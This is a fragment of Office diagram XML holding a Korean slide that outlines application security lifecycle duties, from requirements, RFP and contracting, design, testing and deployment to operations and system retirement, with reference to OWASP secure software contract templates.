    <dgm:cxn modelId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" srcOrd="4" destOrd="0" parTransId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" sibTransId="{A003834B-8490-4CC6-B531-19539D19FBD4}"/>
    <dgm:cxn modelId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" srcOrd="3" destOrd="0" parTransId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" sibTransId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}"/>
    <dgm:cxn modelId="{60BB04CD-C384-4176-8445-5069F086D4F3}" type="presOf" srcId="{CB1D9058-860B-438C-8C00-7CF2B819DFC6}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{86F94DD0-2236-42C1-9D91-4B8FA24CEAD5}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{358EDF8C-8C6C-4A98-AD7C-BA54D7458D84}" srcOrd="3" destOrd="0" parTransId="{93923CD5-3F77-4BB0-ABCA-1FC684535BD5}" sibTransId="{52D6C55F-602E-4052-B50B-CD9890407F6F}"/>
    <dgm:cxn modelId="{38EC86D0-47A0-4CFB-867C-A8305A0F5C32}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7E8F4C90-7FEA-4CEC-9A03-4131742A1B05}" srcOrd="2" destOrd="0" parTransId="{08FB0993-107F-4CBD-ADBD-C46189952032}" sibTransId="{A59E2D66-3B71-4422-8BE4-2581A0D775C8}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149158D8-32A0-47FE-89B1-14EA607A9E54}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" srcOrd="0" destOrd="0" parTransId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" sibTransId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}"/>
    <dgm:cxn modelId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" srcOrd="0" destOrd="0" parTransId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" sibTransId="{1EBA831D-0061-461C-A1EF-795466184E12}"/>
    <dgm:cxn modelId="{BE1FD6E8-AF10-4756-B80B-7770C6861EF2}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
    <dgm:cxn modelId="{7BCF84F2-417C-4A0C-990D-D245E99C755E}" type="presOf" srcId="{C4BCA67E-35D2-4123-A053-DEE8FFAB5595}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FAE66AF5-4077-4D27-A40A-8EC2A257AEBE}" type="presOf" srcId="{0E290240-FB25-48CB-9DE8-8ECF38AAE9C1}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{608AB0F8-C448-4C15-A7B5-2B5AE3EBE4FA}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{567F56F9-2C19-43DB-8AA6-0E2DB6B91CBC}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{27564A9E-075C-4939-8225-C2C8BB7C535B}" srcOrd="1" destOrd="0" parTransId="{AE84C732-5AE2-4FE5-8F2C-5153D9D1749F}" sibTransId="{7B0C8DD3-C865-4E46-895E-BCF98E80DFB5}"/>
    <dgm:cxn modelId="{373A68CE-BA1B-41A1-9F29-AB2D975B3BC9}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{27609E10-36B7-4CCE-BBA2-B1583E7C9FD6}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{075E07C0-48A1-4677-8E4C-E95BB61FCB53}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C84A3201-D19A-489D-B718-F80B3A546796}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73F07A02-3F34-410F-B351-F390C94BE42E}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2142A4F5-B8FA-4706-B367-C95960C26637}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{004EEF00-F000-4F12-ABD5-8CA1CD7DD5D2}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{37CDCDA6-BEF1-4ECE-8F47-A23B2A074CDD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AE7812BA-DE2D-44E0-8465-991379AE368E}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C4C44F07-FB8C-4958-AAEB-79ED64685CDE}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E3E89DCB-FAA0-4EA8-9139-A539DE3B707D}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0E27F052-3749-4AC0-A86B-5343DDDF4FEA}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{51395028-26C8-4E59-8FAA-62634D1FCA28}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2012C659-A82A-43EB-86BB-6A8DEEFB2AEE}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7389DA86-2718-4485-9F85-7C98DD1723B6}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26469C85-A9C6-4C96-93D9-10E87BB65C4E}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21813954-F02E-49FE-8653-0A2D2C1BA4D8}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AA865295-AAC8-4DDB-BB7C-3A7333ED2C74}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3EB863C2-3D08-4A1F-858E-656823E94C77}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401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요구사항 및 리소스 관리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</a:rPr>
            <a:t>애플리케이션의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모든 데이터 자산의 기밀성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인증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noProof="0" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>무결성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및 가용성과 관련된 비즈니스 요구사항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예상되는 비즈니스 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" noProof="0" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>로직을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수집하고 협상합니다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제안 요청</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>(RFP) </a:t>
          </a:r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및 계약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계획 및 디자인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개발자와 내부 주주와 계획 및 디자인을 협상합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="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예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보안 전문가</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
          </a:endParaRP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EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/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폐기 시스템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95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" type="parTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}" type="sibTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64E29A9E-D7A3-4691-83A1-965007B0BD7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작업 간 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션의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보안 관리 지침이 포함되어야 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.(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패치 관리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endParaRPr lang="en-US" sz="900" strike="sngStrike" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" type="parTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}" type="sibTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6280EA87-E46C-40B8-91EF-12C1C27B37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필요한 데이터를 보관하고 그 이외의 것은 안전하게 삭제합니다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C08C42A3-E914-4795-97F3-69296AA3F73D}" type="parTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7DE2A44-A11B-4BC7-BC1B-F6D335D0C9F6}" type="sibTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/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테스트 및 배포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A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" type="sibTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" type="parTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED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보안 프로그램과 관련된 가이드 라인 및 보안 요구사항을 포함하여 내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외부 개발자와 요구사항을 협상합니다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.(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: SDLC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모범사례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AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" type="parTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}" type="sibTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>운영 및 변경 관리</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AEE799B-7F35-4AE2-93E2-335733E35922}" type="sibTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" type="parTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C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필요한 인증을 비롯하여 응용 프로그램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인터페이스 및 모든 필수 구성 요소의 안전한 배포를 자동화합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US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CEDD41B6-F9E9-4738-8190-4FA86636363D}" type="parTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}" type="sibTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{719FD505-9C05-4301-8C8D-24A4329404E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기능적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비기능적 보안 요구사항을 포함한 기술적 요구사항을 수집합니다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AU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423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" type="parTrans" cxnId="{DE5646CC-F144-493B-9414-C6346E590FF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{595F5683-5B41-4144-8717-8475FEB51759}" type="sibTrans" cxnId="{DE5646CC-F144-493B-9414-C6346E590FF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E93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보안 활동을 포함하여 설계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구축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테스트 및 운영의 모든 측면을 다루는 예산을 계획하고 협상합니다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AU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918768C3-D12F-4161-B487-A57F29898241}" type="parTrans" cxnId="{34810BA8-ABE6-4135-9DA7-66092273C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}" type="sibTrans" cxnId="{34810BA8-ABE6-4135-9DA7-66092273C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F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계획 및 설계 단계를 포함한 모든 기술적 요구사항의 이행을 평가합니다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21595102-299C-4FC9-AD15-9036120CA438}" type="parTrans" cxnId="{953325A0-207E-4AE6-A6DC-14B69025B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}" type="sibTrans" cxnId="{953325A0-207E-4AE6-A6DC-14B69025B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38353036-4B60-4F8B-ACD2-5B049C807A9A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디자인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보안 및 서비스 수준 계약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(SLA)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을 포함한 모든 기술적 요구사항을 협상합니다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73A5B6BE-984C-43D5-83D1-70267B05EA9B}" type="parTrans" cxnId="{CFC5E301-BDE4-4D4C-B6FC-1C26EB94D275}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{514DE64B-2054-4928-808C-6A92FFA3AA8E}" type="sibTrans" cxnId="{CFC5E301-BDE4-4D4C-B6FC-1C26EB94D275}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{495252AF-5996-4B38-A1EE-B648650A10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en-US" sz="900" noProof="0" dirty="0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OWASP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안전한 소프트웨어 계약 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" noProof="0" dirty="0" err="1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부록</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" noProof="0" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>와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같은 템플릿과 체크리스트를 채택하십시오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5602DF29-E513-4B50-B37A-05F44A5B2860}" type="parTrans" cxnId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F126DBDA-495B-4894-915F-3153C0E98C12}" type="sibTrans" cxnId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{657D5226-6628-4A3D-87F9-833B7666A7A2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보호 요구사항 및 예상 위협 수준에 적합한 보안 아키텍처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통제 및 대응책을 정의합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="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이러한 절차는 보안 전문가의 지원을 받아야 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6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" type="parTrans" cxnId="{6C048991-4CC6-48F3-85DE-06094639B4B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}" type="sibTrans" cxnId="{6C048991-4CC6-48F3-85DE-06094639B4B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB9F0EAE-C91F-4A65-B43A-46392ED3873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</a:rPr>
            <a:t>애플리케이션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소유자가 남은 위험을 수용하거나 추가 리소스를 제공하는지 확인합니다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DA9F1A23-7ABB-43F5-841D-3D2FC9925CFB}" type="parTrans" cxnId="{2B332EAB-1224-4EC7-902F-FB64603358D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2D6A2A1-5438-4DC5-806B-70724658813A}" type="sibTrans" cxnId="{2B332EAB-1224-4EC7-902F-FB64603358D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE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 err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>비기능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 요구사항에 대해 추가된 제약 조건을 포함하여 보안 사례를 생성합니다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F5BE4E3D-749F-4DF5-916A-F051FA94842E}" type="parTrans" cxnId="{62404027-5448-4393-9E79-DA90FB84286A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03388AB2-B7BD-4A7D-8228-58066747E14F}" type="sibTrans" cxnId="{62404027-5448-4393-9E79-DA90FB84286A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{436ACC70-9A3F-496B-A85D-CF77D7FC720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기술 및 비즈니스 관점에서 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“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사용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”, “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악용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”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의 테스트 케이스를 작성합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU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97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" type="parTrans" cxnId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
